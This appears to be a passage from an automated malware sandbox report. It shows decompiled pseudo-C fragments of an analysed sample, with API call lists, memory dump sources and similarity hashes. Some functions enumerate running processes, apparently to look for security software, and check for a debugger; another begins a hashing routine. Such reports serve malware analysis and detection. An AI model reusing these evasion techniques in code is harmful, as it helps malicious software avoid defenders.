                                                                                                                                                                                                                                									HeapFree( *0xa8d270, 0, _t103);
                                                                                                                                                                                                                                									_v12 = 0;
                                                                                                                                                                                                                                									goto L67;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								goto L59;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}






































                                                                                                                                                                                                                                0x00a82538
                                                                                                                                                                                                                                0x00a8253a
                                                                                                                                                                                                                                0x00a8253b
                                                                                                                                                                                                                                0x00a8253b
                                                                                                                                                                                                                                0x00a82538
                                                                                                                                                                                                                                0x00a82542
                                                                                                                                                                                                                                0x00a82558
                                                                                                                                                                                                                                0x00a82544
                                                                                                                                                                                                                                0x00a82544
                                                                                                                                                                                                                                0x00a82551
                                                                                                                                                                                                                                0x00a82551
                                                                                                                                                                                                                                0x00a8255c
                                                                                                                                                                                                                                0x00a8256a
                                                                                                                                                                                                                                0x00a82574
                                                                                                                                                                                                                                0x00a82574
                                                                                                                                                                                                                                0x00a8257b
                                                                                                                                                                                                                                0x00a82591
                                                                                                                                                                                                                                0x00a8257d
                                                                                                                                                                                                                                0x00a8257d
                                                                                                                                                                                                                                0x00a8258a
                                                                                                                                                                                                                                0x00a8258a
                                                                                                                                                                                                                                0x00a82595
                                                                                                                                                                                                                                0x00a825a8
                                                                                                                                                                                                                                0x00a825a8
                                                                                                                                                                                                                                0x00a825ad
                                                                                                                                                                                                                                0x00a825b3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82597
                                                                                                                                                                                                                                0x00a8259a
                                                                                                                                                                                                                                0x00a8259f
                                                                                                                                                                                                                                0x00a825a6
                                                                                                                                                                                                                                0x00a825b8
                                                                                                                                                                                                                                0x00a825ba
                                                                                                                                                                                                                                0x00a825d0
                                                                                                                                                                                                                                0x00a825bc
                                                                                                                                                                                                                                0x00a825bc
                                                                                                                                                                                                                                0x00a825c9
                                                                                                                                                                                                                                0x00a825c9
                                                                                                                                                                                                                                0x00a825d4
                                                                                                                                                                                                                                0x00a825e0
                                                                                                                                                                                                                                0x00a825e5
                                                                                                                                                                                                                                0x00a825e5
                                                                                                                                                                                                                                0x00a825d6
                                                                                                                                                                                                                                0x00a825d9
                                                                                                                                                                                                                                0x00a825d9
                                                                                                                                                                                                                                0x00a825f3
                                                                                                                                                                                                                                0x00a825f8
                                                                                                                                                                                                                                0x00a825fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a825fe
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a825a6
                                                                                                                                                                                                                                0x00a82595
                                                                                                                                                                                                                                0x00a824fe
                                                                                                                                                                                                                                0x00a824f2

APIs
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82400
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82432
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82464
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A82496
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A824C8
• StrToIntExA.SHLWAPI(00000000,00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008), ref: 00A824FA
• HeapFree.KERNEL32(00000000,00A85884,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008,?,00A85884), ref: 00A825F8
• HeapFree.KERNEL32(00000000,?,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005,00A8D00C,00000008,?,00A85884), ref: 00A8260B
  • Part of subcall function 00A81685: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,00A85884,00A825DE,00000000,00A85884,?,69B25F44,?,00A85884,69B25F44,?,00A85884,69B25F44,00000005), ref: 00A8168E
  • Part of subcall function 00A81685: memcpy.NTDLL(00000000,?,00000000,00000001,?,00A85884), ref: 00A816B1
  • Part of subcall function 00A81685: memset.NTDLL ref: 00A816C0
Strings
Memory Dump Source
• Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
Similarity
• API ID: FreeHeap$lstrlenmemcpymemset
• String ID: Uxt
• API String ID: 3442150357-1536154274
• Opcode ID: 04556d69400d792a3dee237aa6a6f447ba51711e028766e0c8e18fc191fc5760
• Instruction ID: d3713cfe97829acc6891bc6fb8f1d726b8032ae0fc978087cdef2b9cb5dbb30e
• Opcode Fuzzy Hash: 04556d69400d792a3dee237aa6a6f447ba51711e028766e0c8e18fc191fc5760
• Instruction Fuzzy Hash: 89816070A10204AFDB25FBB4DD84EBF7BF9EB48740B244926B402D7155FA39DD429B21
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D76ED(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                				char _v0;
                                                                                                                                                                                                                                				struct _EXCEPTION_POINTERS _v12;
                                                                                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				intOrPtr _v608;
                                                                                                                                                                                                                                				intOrPtr _v612;
                                                                                                                                                                                                                                				void* _v616;
                                                                                                                                                                                                                                				intOrPtr _v620;
                                                                                                                                                                                                                                				char _v624;
                                                                                                                                                                                                                                				intOrPtr _v628;
                                                                                                                                                                                                                                				intOrPtr _v632;
                                                                                                                                                                                                                                				intOrPtr _v636;
                                                                                                                                                                                                                                				intOrPtr _v640;
                                                                                                                                                                                                                                				intOrPtr _v644;
                                                                                                                                                                                                                                				intOrPtr _v648;
                                                                                                                                                                                                                                				intOrPtr _v652;
                                                                                                                                                                                                                                				intOrPtr _v656;
                                                                                                                                                                                                                                				intOrPtr _v660;
                                                                                                                                                                                                                                				intOrPtr _v664;
                                                                                                                                                                                                                                				intOrPtr _v668;
                                                                                                                                                                                                                                				char _v808;
                                                                                                                                                                                                                                				char* _t39;
                                                                                                                                                                                                                                				long _t49;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                				intOrPtr* _t60;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t59 = __esi;
                                                                                                                                                                                                                                				_t58 = __edi;
                                                                                                                                                                                                                                				_t57 = __edx;
                                                                                                                                                                                                                                				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                                                                                                                                                                                                					_t55 = _a4;
                                                                                                                                                                                                                                					asm("int 0x29");
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7808(_t34);
                                                                                                                                                                                                                                				 *_t60 = 0x2cc;
                                                                                                                                                                                                                                				_v632 = E736D7DE0(_t58,  &_v808, 0, 3);
                                                                                                                                                                                                                                				_v636 = _t55;
                                                                                                                                                                                                                                				_v640 = _t57;
                                                                                                                                                                                                                                				_v644 = _t51;
                                                                                                                                                                                                                                				_v648 = _t59;
                                                                                                                                                                                                                                				_v652 = _t58;
                                                                                                                                                                                                                                				_v608 = ss;
                                                                                                                                                                                                                                				_v620 = cs;
                                                                                                                                                                                                                                				_v656 = ds;
                                                                                                                                                                                                                                				_v660 = es;
                                                                                                                                                                                                                                				_v664 = fs;
                                                                                                                                                                                                                                				_v668 = gs;
                                                                                                                                                                                                                                				asm("pushfd");
                                                                                                                                                                                                                                				_pop( *_t15);
                                                                                                                                                                                                                                				_v624 = _v0;
                                                                                                                                                                                                                                				_t39 =  &_v0;
                                                                                                                                                                                                                                				_v612 = _t39;
                                                                                                                                                                                                                                				_v808 = 0x10001;
                                                                                                                                                                                                                                				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                                                                                                                                                                                                				E736D7DE0(_t58,  &_v92, 0, 0x50);
                                                                                                                                                                                                                                				_v92 = 0x40000015;
                                                                                                                                                                                                                                				_v88 = 1;
                                                                                                                                                                                                                                				_v80 = _v0;
                                                                                                                                                                                                                                				_t28 = IsDebuggerPresent() - 1; // -1
                                                                                                                                                                                                                                				_v12.ExceptionRecord =  &_v92;
                                                                                                                                                                                                                                				asm("sbb bl, bl");
                                                                                                                                                                                                                                				_v12.ContextRecord =  &_v808;
                                                                                                                                                                                                                                				_t54 =  ~_t28 + 1;
                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                				_t49 = UnhandledExceptionFilter( &_v12);
                                                                                                                                                                                                                                				if(_t49 == 0 && _t54 == 0) {
                                                                                                                                                                                                                                					_push(3);
                                                                                                                                                                                                                                					return E736D7808(_t49);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t49;
                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 736D76F9
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 736D77C5
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 736D77E5
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 736D77EF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction ID: ba578deb28372b94fd4a343730852cda3a5210a302ad2b2cb0f2fc68afcb84f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3106B5D512189BDF11DFA5C989BCCBBB8BF08305F1040EAE40DAB280EB715A88DF45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A8A1D4() {
                                                                                                                                                                                                                                				char _v264;
                                                                                                                                                                                                                                				void* _v300;
                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t15 = 0;
                                                                                                                                                                                                                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                                                					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                					while(_t8 != 0) {
                                                                                                                                                                                                                                						_t9 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                						_t2 = _t9 + 0xa8ee3c; // 0x73617661
                                                                                                                                                                                                                                						_push( &_v264);
                                                                                                                                                                                                                                						if( *0xa8d110() != 0) {
                                                                                                                                                                                                                                							_t15 = 1;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                						CloseHandle(_t17);
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L8:
                                                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                                                			}










APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A8A1E4
• Process32First.KERNEL32(00000000,?), ref: 00A8A1F7
• Process32Next.KERNEL32(00000000,?), ref: 00A8A223
• CloseHandle.KERNEL32(00000000), ref: 00A8A232

Memory Dump Source
• Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp

Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 8d0454b241f3df0e08e128675ee2f0c01e497adef1ddf639a565eaf68216454d
• Instruction ID: f8aa8c336c47063d178fea50be9b39920f4b977260ce9c7eefbe9fa359779217
• Opcode Fuzzy Hash: 8d0454b241f3df0e08e128675ee2f0c01e497adef1ddf639a565eaf68216454d
• Instruction Fuzzy Hash: CDF096315011246AE720F7659C09DEF776CEB96710F000162F956D3050FA30D94687B2

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E736D9FB8(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				char _v0;
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				intOrPtr _v524;
                                                                                                                                                                                                                                				intOrPtr _v528;
                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                				intOrPtr _v536;
                                                                                                                                                                                                                                				char _v540;
                                                                                                                                                                                                                                				intOrPtr _v544;
                                                                                                                                                                                                                                				intOrPtr _v548;
                                                                                                                                                                                                                                				intOrPtr _v552;
                                                                                                                                                                                                                                				intOrPtr _v556;
                                                                                                                                                                                                                                				intOrPtr _v560;
                                                                                                                                                                                                                                				intOrPtr _v564;
                                                                                                                                                                                                                                				intOrPtr _v568;
                                                                                                                                                                                                                                				intOrPtr _v572;
                                                                                                                                                                                                                                				intOrPtr _v576;
                                                                                                                                                                                                                                				intOrPtr _v580;
                                                                                                                                                                                                                                				intOrPtr _v584;
                                                                                                                                                                                                                                				char _v724;
                                                                                                                                                                                                                                				intOrPtr _v792;
                                                                                                                                                                                                                                				intOrPtr _v800;
                                                                                                                                                                                                                                				char _v804;
                                                                                                                                                                                                                                				struct _EXCEPTION_POINTERS _v812;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				char* _t47;
                                                                                                                                                                                                                                				char* _t49;
                                                                                                                                                                                                                                				intOrPtr _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                                                				int _t67;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t68 = __esi;
                                                                                                                                                                                                                                				_t65 = __edx;
                                                                                                                                                                                                                                				_t60 = __ebx;
                                                                                                                                                                                                                                				_t40 =  *0x736eb004; // 0xa11be602
                                                                                                                                                                                                                                				_t41 = _t40 ^ _t69;
                                                                                                                                                                                                                                				_v8 = _t40 ^ _t69;
                                                                                                                                                                                                                                				if(_a4 != 0xffffffff) {
                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                					E736D7808(_t41);
                                                                                                                                                                                                                                					_pop(_t61);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t66,  &_v804, 0, 0x50);
                                                                                                                                                                                                                                				E736D7DE0(_t66,  &_v724, 0, 0x2cc);
                                                                                                                                                                                                                                				_v812.ExceptionRecord =  &_v804;
                                                                                                                                                                                                                                				_t47 =  &_v724;
                                                                                                                                                                                                                                				_v812.ContextRecord = _t47;
                                                                                                                                                                                                                                				_v548 = _t47;
                                                                                                                                                                                                                                				_v552 = _t61;
                                                                                                                                                                                                                                				_v556 = _t65;
                                                                                                                                                                                                                                				_v560 = _t60;
                                                                                                                                                                                                                                				_v564 = _t68;
                                                                                                                                                                                                                                				_v568 = _t66;
                                                                                                                                                                                                                                				_v524 = ss;
                                                                                                                                                                                                                                				_v536 = cs;
                                                                                                                                                                                                                                				_v572 = ds;
                                                                                                                                                                                                                                				_v576 = es;
                                                                                                                                                                                                                                				_v580 = fs;
                                                                                                                                                                                                                                				_v584 = gs;
                                                                                                                                                                                                                                				asm("pushfd");
                                                                                                                                                                                                                                				_pop( *_t22);
                                                                                                                                                                                                                                				_v540 = _v0;
                                                                                                                                                                                                                                				_t49 =  &_v0;
                                                                                                                                                                                                                                				_v528 = _t49;
                                                                                                                                                                                                                                				_v724 = 0x10001;
                                                                                                                                                                                                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                                                                                                                                                                                                				_v804 = _a8;
                                                                                                                                                                                                                                				_v800 = _a12;
                                                                                                                                                                                                                                				_v792 = _v0;
                                                                                                                                                                                                                                				_t67 = IsDebuggerPresent();
                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                                                                                                                                                                                                					_push(_a4);
                                                                                                                                                                                                                                					_t57 = E736D7808(_t57);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return E736D6EA3(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 736DA0B0
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 736DA0BA
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 736DA0C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                • Opcode ID: 69453ecd512e16ba55018be91426ee17e439c5dcc7fb831cb5e60a4ebe425310
                                                                                                                                                                                                                                • Instruction ID: 13cf266ce687966d4788c3cf5a6a6c604e7efa0b2e877817838f7c65aeb298d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69453ecd512e16ba55018be91426ee17e439c5dcc7fb831cb5e60a4ebe425310
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC31E57595132C9BCF21DF25D988B8CBBB8BF08310F6041EAE40CA7290EB709B858F45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8DCB(int _a4) {
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				if(E736D9F85(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                                                                                                                                                                                					TerminateProcess(GetCurrentProcess(), _a4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D8E50(_t14, _a4);
                                                                                                                                                                                                                                				ExitProcess(_a4);
                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,736D8DCA,?,00000001,?,?), ref: 736D8DED
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,736D8DCA,?,00000001,?,?), ref: 736D8DF4
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 736D8E06
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                • Opcode ID: 8b29fc0df85888af40a4131d13d0a6d3ceec61b955c34a27a0badf0754762fc0
                                                                                                                                                                                                                                • Instruction ID: 3459ab2d196b1646e32192a3d16448950a22a397adb77cc1ff3a04dffd9c6b2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b29fc0df85888af40a4131d13d0a6d3ceec61b955c34a27a0badf0754762fc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3E08C72050288EFCF127FA6CA0CB4C3B79FB94A46B104454F80A8A1A8CF39D946EB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 49%
                                                                                                                                                                                                                                			E00A83089(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                                                				void _v76;
                                                                                                                                                                                                                                				intOrPtr* _t226;
                                                                                                                                                                                                                                				signed int _t229;
                                                                                                                                                                                                                                				signed int _t231;
                                                                                                                                                                                                                                				signed int _t233;
                                                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                                                				signed int _t237;
                                                                                                                                                                                                                                				signed int _t239;
                                                                                                                                                                                                                                				signed int _t241;
                                                                                                                                                                                                                                				signed int _t243;
                                                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                                                				signed int _t247;
                                                                                                                                                                                                                                				signed int _t249;
                                                                                                                                                                                                                                				signed int _t251;
                                                                                                                                                                                                                                				signed int _t253;
                                                                                                                                                                                                                                				signed int _t255;
                                                                                                                                                                                                                                				signed int _t257;
                                                                                                                                                                                                                                				signed int _t259;
                                                                                                                                                                                                                                				signed int _t338;
                                                                                                                                                                                                                                				signed char* _t348;
                                                                                                                                                                                                                                				signed int _t349;
                                                                                                                                                                                                                                				signed int _t351;
                                                                                                                                                                                                                                				signed int _t353;
                                                                                                                                                                                                                                				signed int _t355;
                                                                                                                                                                                                                                				signed int _t357;
                                                                                                                                                                                                                                				signed int _t359;
                                                                                                                                                                                                                                				signed int _t361;
                                                                                                                                                                                                                                				signed int _t363;
                                                                                                                                                                                                                                				signed int _t365;
                                                                                                                                                                                                                                				signed int _t367;
                                                                                                                                                                                                                                				signed int _t376;
                                                                                                                                                                                                                                				signed int _t378;
                                                                                                                                                                                                                                				signed int _t380;
                                                                                                                                                                                                                                				signed int _t382;
                                                                                                                                                                                                                                				signed int _t384;
                                                                                                                                                                                                                                				intOrPtr* _t400;
                                                                                                                                                                                                                                				signed int* _t401;
                                                                                                                                                                                                                                				signed int _t402;
                                                                                                                                                                                                                                				signed int _t404;
                                                                                                                                                                                                                                				signed int _t406;
                                                                                                                                                                                                                                				signed int _t408;
                                                                                                                                                                                                                                				signed int _t410;
                                                                                                                                                                                                                                				signed int _t412;
                                                                                                                                                                                                                                				signed int _t414;
                                                                                                                                                                                                                                				signed int _t416;
                                                                                                                                                                                                                                				signed int _t418;
                                                                                                                                                                                                                                				signed int _t420;
                                                                                                                                                                                                                                				signed int _t422;
                                                                                                                                                                                                                                				signed int _t424;
                                                                                                                                                                                                                                				signed int _t432;
                                                                                                                                                                                                                                				signed int _t434;
                                                                                                                                                                                                                                				signed int _t436;
                                                                                                                                                                                                                                				signed int _t438;
                                                                                                                                                                                                                                				signed int _t440;
                                                                                                                                                                                                                                				signed int _t508;
                                                                                                                                                                                                                                				signed int _t599;
                                                                                                                                                                                                                                				signed int _t607;
                                                                                                                                                                                                                                				signed int _t613;
                                                                                                                                                                                                                                				signed int _t679;
                                                                                                                                                                                                                                				void* _t682;
                                                                                                                                                                                                                                				signed int _t683;
                                                                                                                                                                                                                                				signed int _t685;
                                                                                                                                                                                                                                				signed int _t690;
                                                                                                                                                                                                                                				signed int _t692;
                                                                                                                                                                                                                                				signed int _t697;
                                                                                                                                                                                                                                				signed int _t699;
                                                                                                                                                                                                                                				signed int _t718;
                                                                                                                                                                                                                                				signed int _t720;
                                                                                                                                                                                                                                				signed int _t722;
                                                                                                                                                                                                                                				signed int _t724;
                                                                                                                                                                                                                                				signed int _t726;
                                                                                                                                                                                                                                				signed int _t728;
                                                                                                                                                                                                                                				signed int _t734;
                                                                                                                                                                                                                                				signed int _t740;
                                                                                                                                                                                                                                				signed int _t742;
                                                                                                                                                                                                                                				signed int _t744;
                                                                                                                                                                                                                                				signed int _t746;
                                                                                                                                                                                                                                				signed int _t748;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t226 = _a4;
                                                                                                                                                                                                                                				_t348 = __ecx + 2;
                                                                                                                                                                                                                                				_t401 =  &_v76;
                                                                                                                                                                                                                                				_t682 = 0x10;
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                                                                                                                                                                                                                					_t401 =  &(_t401[1]);
                                                                                                                                                                                                                                					_t348 =  &(_t348[4]);
                                                                                                                                                                                                                                					_t682 = _t682 - 1;
                                                                                                                                                                                                                                				} while (_t682 != 0);
                                                                                                                                                                                                                                				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                                                				_t683 =  *_t6;
                                                                                                                                                                                                                                				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                                                				_t402 =  *_t7;
